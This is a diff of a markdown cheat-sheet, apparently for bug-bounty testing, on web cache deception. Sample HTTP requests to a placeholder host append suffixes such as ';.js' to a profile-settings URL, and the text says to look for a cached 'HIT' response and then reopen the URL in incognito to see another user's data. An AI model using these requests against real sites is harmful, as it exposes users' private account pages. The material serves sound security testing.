| skipped 6 lines |
7 | 7 | | `-` |
8 | 8 | | |
9 | 9 | | ## How to exploit |
10 | | - | * Normal Request |
| 10 | + | * Normal Request (For example in the settings profile feature) |
11 | 11 | | ``` |
12 | 12 | | GET /profile/setting HTTP/1.1 |
13 | 13 | | Host: www.vuln.com |
| skipped 18 lines |
32 | 32 | | Cf-Cache-Status: HIT |
33 | 33 | | ... |
34 | 34 | | ``` |
35 | | - | If the response is success, try to open the url in the incognito mode. |
| 35 | + | If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode |
36 | 36 | | |
37 | | - | 2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.) |
| 37 | + | 1. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.) |
38 | 38 | | ``` |
39 | 39 | | GET /profile/setting/;.js HTTP/1.1 |
40 | 40 | | Host: www.vuln.com |
| skipped 5 lines |
46 | 46 | | Cf-Cache-Status: HIT |
47 | 47 | | ... |
48 | 48 | | ``` |
49 | | - | If the response is success, try to open the url in the incognito mode. |
| 49 | + | If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode |
50 | 50 | | |
51 | 51 | | ## References |
52 | 52 | | * [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) |